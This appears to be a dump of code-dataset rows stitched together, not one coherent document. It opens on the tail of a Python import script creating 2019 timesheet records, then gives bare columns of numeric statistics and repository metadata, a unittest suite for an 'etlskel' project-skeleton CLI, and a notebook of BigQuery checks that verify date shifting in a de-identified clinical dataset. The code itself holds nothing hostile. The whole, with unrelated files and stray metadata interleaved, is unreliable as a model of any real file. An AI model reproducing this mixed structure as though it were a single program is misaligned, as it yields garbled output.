( daily_record = dr
, start = '09:15'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:15'
, work_location = '5'
, wp = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '5'
, wp = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '18:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:00'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '09:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '17:00'
, end = '18:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '17:30'
, work_location = '2'
)
db.time_record.create \
( daily_record = dr
, start = '08:30'
, end = '12:00'
, work_location = '2'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, start = '12:30'
, end = '16:00'
, work_location = '1'
)
db.time_record.create \
( daily_record = dr
, start = '08:00'
, end = '12:00'
, work_location = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-09-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-11.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-12.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-13.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-14.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-15.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-16.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-17.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-18.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-19.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-20.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-21.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-22.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-23.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-24.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-25.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-26.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-27.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-28.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-29.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-30.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-10-31.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-01.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.time_record.create \
( daily_record = dr
, duration = 7.5
, work_location = '5'
, wp = '1'
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-02.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-03.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-04.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-05.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-06.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-07.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-08.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-09.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
dr = db.daily_record.create \
( user = user
, date = date.Date ('2019-11-10.00:00:00')
, weekend_allowed = 0
, required_overtime = 0
)
db.commit ()
# end def import_data_18
| 28.879749
| 64
| 0.408435
| 9,166
| 87,419
| 3.739363
| 0.01331
| 0.145062
| 0.094179
| 0.141269
| 0.991335
| 0.989322
| 0.987805
| 0.987688
| 0.983866
| 0.981152
| 0
| 0.127115
| 0.467885
| 87,419
| 3,026
| 65
| 28.889293
| 0.609713
| 0.000252
| 0
| 0.775463
| 0
| 0
| 0.079009
| 0
| 0
| 0
| 0
| 0
| 0.000661
| 1
| 0.000331
| false
| 0
| 0.000661
| 0
| 0.000992
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0686fff069deb82b8d08160d4b0a878dc045e130
| 6,003
|
py
|
Python
|
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | 2
|
2020-04-01T10:08:02.000Z
|
2021-03-07T15:18:14.000Z
|
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | null | null | null |
tests/test_etlskel_full.py
|
slouchart/pyetllib
|
133df36a1628f413cd60a86e4c7eac2738844d17
|
[
"MIT"
] | 1
|
2020-10-13T13:23:02.000Z
|
2020-10-13T13:23:02.000Z
|
from unittest import TestCase
from unittest import main as run_tests
from pathlib import Path
from click.testing import CliRunner
from src.pyetllib.etlskel.cli import etlskel
class TestEndToEndEtlSkel(TestCase):
    """End-to-end tests for the ``etlskel`` CLI.

    Each test invokes the command inside an isolated temporary filesystem
    and asserts which project-skeleton paths were (or were not) created.
    """

    def setUp(self):
        self.runner = CliRunner()
        self.root_dir = 'to_be_removed'

    def assertPathPresent(self, *pathparts):
        """Assert the path joined from *pathparts* exists in the cwd."""
        self.assertTrue(
            Path().joinpath(*pathparts).exists(),
            f"Path {Path().joinpath(*pathparts)} does not exist "
            f"in the current directory"
        )

    def assertPathNotPresent(self, *pathparts):
        """Assert the path joined from *pathparts* does NOT exist in the cwd."""
        self.assertFalse(
            Path().joinpath(*pathparts).exists(),
            f"Path {Path().joinpath(*pathparts)} does exist "
            f"in the current directory"
        )

    def filesystem_cm(self):
        """Return a context manager providing an empty isolated working dir."""
        return self.runner.isolated_filesystem()

    def invoke_cli(self, opts):
        """Run ``etlskel`` with *opts* plus the target dir, answering 'y' to prompts."""
        return self.runner.invoke(etlskel, opts + [self.root_dir], input='y')

    def test_basic_no_opts(self):
        """Default invocation creates package, templates, tests and metadata files."""
        options = []
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir,
                                   'templates')
            self.assertPathPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathPresent(self.root_dir, 'MANIFEST.in')

    def test_no_template(self):
        """--no-template-dir omits templates/ and MANIFEST.in."""
        options = ['--no-template-dir']
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir)
            self.assertPathNotPresent(self.root_dir, self.root_dir,
                                      'templates')
            self.assertPathPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')

    def test_no_test(self):
        """--no-test-package omits the tests/ directory only."""
        options = ['--no-test-package']
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir,
                                   'templates')
            self.assertPathNotPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathPresent(self.root_dir, 'MANIFEST.in')

    def test_no_template_no_test(self):
        """Both --no-* flags combined omit templates/, tests/ and MANIFEST.in."""
        options = ['--no-test-package', '--no-template-dir']
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathPresent(self.root_dir, self.root_dir)
            self.assertPathNotPresent(self.root_dir, self.root_dir,
                                      'templates')
            self.assertPathNotPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')

    def test_with_src_dir(self):
        """-s places the package under src/ instead of the project root."""
        options = ['-s']
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathPresent(self.root_dir, 'src')
            self.assertPathNotPresent(self.root_dir, self.root_dir)
            self.assertPathPresent(self.root_dir, 'src', self.root_dir)
            self.assertPathPresent(self.root_dir, 'src', self.root_dir,
                                   'templates')
            self.assertPathPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathPresent(self.root_dir, 'MANIFEST.in')

    def test_alt_package_name(self):
        """-p names the inner package independently from the project dir."""
        package = 'foo'
        options = ['-p', package]
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathNotPresent(self.root_dir, self.root_dir)
            self.assertPathPresent(self.root_dir, package)
            self.assertPathPresent(self.root_dir, package, 'templates')
            self.assertPathPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathPresent(self.root_dir, 'MANIFEST.in')

    def test_all_opt_together(self):
        """All options combined behave consistently.

        BUG FIX: this was named ``all_opt_together``, so the unittest
        runner never collected it and the test silently never ran.
        """
        package = 'foo'
        options = [
            '-p', package,
            '-s',
            '--no-test-package',
            '--no-template-dir'
        ]
        with self.filesystem_cm():
            _ = self.invoke_cli(options)
            self.assertPathPresent(self.root_dir)
            self.assertPathNotPresent(self.root_dir, self.root_dir)
            self.assertPathNotPresent(self.root_dir, package)
            self.assertPathNotPresent(self.root_dir, package, 'templates')
            self.assertPathPresent(self.root_dir, 'src', package)
            self.assertPathNotPresent(self.root_dir, 'src', package,
                                      'templates')
            self.assertPathNotPresent(self.root_dir, 'tests')
            self.assertPathPresent(self.root_dir, 'setup.py')
            self.assertPathPresent(self.root_dir, 'README.md')
            self.assertPathNotPresent(self.root_dir, 'MANIFEST.in')

    def tearDown(self) -> None:
        # isolated_filesystem() cleans up after itself; nothing to do here.
        pass
# Allow running this test module directly; delegates to unittest.main.
if __name__ == '__main__':
    run_tests(verbosity=2)
| 41.6875
| 77
| 0.613693
| 637
| 6,003
| 5.587127
| 0.120879
| 0.157348
| 0.216353
| 0.334083
| 0.834223
| 0.831413
| 0.787862
| 0.760326
| 0.759764
| 0.759764
| 0
| 0.00023
| 0.274863
| 6,003
| 143
| 78
| 41.979021
| 0.817367
| 0
| 0
| 0.576
| 0
| 0
| 0.09995
| 0.009662
| 0
| 0
| 0
| 0
| 0.472
| 1
| 0.104
| false
| 0.008
| 0.04
| 0.016
| 0.168
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
233ba1d3c7699ecb7452ec267a443083c7565517
| 15,702
|
py
|
Python
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 16
|
2017-06-30T20:05:05.000Z
|
2022-03-08T21:03:19.000Z
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 342
|
2017-06-23T21:37:40.000Z
|
2022-03-30T16:44:16.000Z
|
data_steward/analytics/rt_cdr_qc/cdr_deid_qa_report4_dateshift.py
|
lrwb-aou/curation
|
e80447e56d269dc2c9c8bc79e78218d4b0dc504c
|
[
"MIT"
] | 33
|
2017-07-01T00:12:20.000Z
|
2022-01-26T18:06:53.000Z
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.7.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] papermill={"duration": 0.024011, "end_time": "2021-02-02T22:30:31.951734", "exception": false, "start_time": "2021-02-02T22:30:31.927723", "status": "completed"} tags=[]
# # QA queries on new CDR_deid dateshift
#
# Quality checks performed on a new CDR dataset using QA queries
# + papermill={"duration": 0.709639, "end_time": "2021-02-02T22:30:32.661373", "exception": false, "start_time": "2021-02-02T22:30:31.951734", "status": "completed"} tags=[]
import urllib
import pandas as pd
pd.options.display.max_rows = 120  # show up to 120 rows when displaying query results
# + tags=["parameters"]
# Papermill-injected parameters: BigQuery project and dataset identifiers.
project_id = ""  # GCP project hosting the datasets
com_cdr = ""     # combined (non-deidentified) CDR dataset
deid_cdr = ""    # de-identified CDR dataset
pipeline=""      # pipeline dataset that holds the pid_rid_mapping table
# -
# df accumulates one {query, result} row per QA check; rendered as the summary at the end
df = pd.DataFrame(columns = ['query', 'result'])
# + [markdown] papermill={"duration": 0.02327, "end_time": "2021-02-02T22:30:32.708257", "exception": false, "start_time": "2021-02-02T22:30:32.684987", "status": "completed"} tags=[]
# # 1 DS_1 Verify that the field identified to follow the date shift rule as de-identification action in OBSERVATION table have been randomly date shifted.
# + papermill={"duration": 4.105203, "end_time": "2021-02-02T22:30:36.813460", "exception": false, "start_time": "2021-02-02T22:30:32.708257", "status": "completed"} tags=[]
# DS_1: every de-identified observation_date must differ from the original
# by exactly the per-person shift recorded in pid_rid_mapping.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.observation_date), DATE(d.observation_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.observation` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.observation` d
ON d.observation_id = i.observation_id)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query1 OBSERVATION', 'result': outcome},
               ignore_index=True)
df1
# -
# # 3 DS_3 Verify that the field identified to follow the date shift rule as de-identification action in OBSERVATION_PERIOD table have been randomly date shifted.
# + papermill={"duration": 2.136748, "end_time": "2021-02-02T22:30:39.044867", "exception": false, "start_time": "2021-02-02T22:30:36.908119", "status": "completed"} tags=[]
# DS_3: same date-shift rule applied to OBSERVATION_PERIOD start dates.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.observation_period_start_date), DATE(d.observation_period_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.observation_period` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.observation_period` d
ON d.observation_period_id = i.observation_period_id)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query3 OBSERVATION_PERIOD', 'result': outcome},
               ignore_index=True)
df1
# + [markdown] papermill={"duration": 0.023649, "end_time": "2021-02-02T22:30:39.115495", "exception": false, "start_time": "2021-02-02T22:30:39.091846", "status": "completed"} tags=[]
# # 4 DS_4 Verify that the field identified to follow the date shift rule as de-identification action in PERSON table have been randomly date shifted.
# + papermill={"duration": 2.338821, "end_time": "2021-02-02T22:30:41.501415", "exception": false, "start_time": "2021-02-02T22:30:39.162594", "status": "completed"} tags=[]
# DS_4: birth_datetime in PERSON must be shifted by the mapped amount.
# Note: PERSON is joined via research_id since person_id is re-mapped in deid.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.birth_datetime), DATE(d.birth_datetime),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.person` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.person` d
ON d.person_id = m.research_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query4 Person table', 'result': outcome},
               ignore_index=True)
df1
# -
# # 5 DS_5 Verify that the field identified to follow the date shift rule as de-identification action in SPECIMEN table have been randomly date shifted.
# + papermill={"duration": 2.338821, "end_time": "2021-02-02T22:30:41.501415", "exception": false, "start_time": "2021-02-02T22:30:39.162594", "status": "completed"} tags=[]
# DS_5: specimen_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.specimen_date), DATE(d.specimen_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.specimen` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.specimen` d
ON d.specimen_id = i.specimen_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query5 SPECIMEN', 'result': outcome},
               ignore_index=True)
df1
# -
# # 6 DS_6 Verify that the field identified to follow the date shift rule as de-identification action in DEATH table have been randomly date shifted.
# DS_6: death_date must be shifted by the mapped amount.  DEATH has no
# surrogate row id, so rows are matched on research_id + death_type_concept_id.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.death_date), DATE(d.death_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.death` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.death` d
ON m.research_id = d.person_id
AND i.death_type_concept_id = d.death_type_concept_id
)
SELECT COUNT (*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query6 Death', 'result': outcome},
               ignore_index=True)
df1
# + [markdown] papermill={"duration": 0.023411, "end_time": "2021-02-02T22:30:39.091846", "exception": false, "start_time": "2021-02-02T22:30:39.068435", "status": "completed"} tags=[]
# # 7 DS_7 Verify that the field identified to follow the date shift rule as de-identification action in VISIT OCCURENCE table have been randomly date shifted.
# -
# DS_7: visit_start_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.visit_start_date), DATE(d.visit_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.visit_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.visit_occurrence` d
ON d.visit_occurrence_id = i.visit_occurrence_id
)
SELECT COUNT (*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query7 Visit', 'result': outcome},
               ignore_index=True)
df1
# # 8 DS_8 Verify that the field identified to follow the date shift rule as de-identification action in PROCEDURE OCCURENCE table have been randomly date shifted.
#
# DS_8: procedure_date must be shifted by the mapped amount.
query = f'''
WITH df1 as (
SELECT
DATE_DIFF(DATE(i.procedure_date), DATE(d.procedure_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.procedure_occurrence` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.procedure_occurrence` d
ON d.procedure_occurrence_id = i.procedure_occurrence_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query8 PROCEDURE', 'result': outcome},
               ignore_index=True)
df1
# # 9 DS_9 Verify that the field identified to follow the date shift rule as de-identification action in DRUG EXPOSURE table have been randomly date shifted.
# DS_9: drug_exposure_start_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.drug_exposure_start_date), DATE(d.drug_exposure_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.drug_exposure` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.drug_exposure` d
ON i.drug_exposure_id = d.drug_exposure_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
# BUG FIX: the result was assigned to `df9` while the pass/fail check and the
# display below read `df1`, which still held Query8's result -- so this check
# never looked at the drug_exposure data at all.
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query9 Drug table', 'result': outcome},
               ignore_index=True)
df1
# # 10 DS_10 Verify that the field identified to follow the date shift rule as de-identification action in DEVICE EXPOSURE table have been randomly date shifted.
# DS_10: device_exposure_start_date must be shifted by the mapped amount.
query = f'''
WITH df1 AS (
SELECT
DATE_DIFF(DATE(i.device_exposure_start_date), DATE(d.device_exposure_start_date),day)-m.shift as diff
FROM `{project_id}.{pipeline}.pid_rid_mapping` m
JOIN `{project_id}.{com_cdr}.device_exposure` i
ON m.person_id = i.person_id
JOIN `{project_id}.{deid_cdr}.device_exposure` d
ON i.device_exposure_id = d.device_exposure_id
)
SELECT COUNT(*) AS n_row_not_pass FROM df1
WHERE diff !=0
'''
df1 = pd.read_gbq(query, dialect='standard')
# A zero n_row_not_pass means every row satisfied the date-shift rule.
outcome = 'PASS' if df1.eq(0).any().any() else ''
df = df.append({'query': 'Query10 Device', 'result': outcome},
               ignore_index=True)
df1
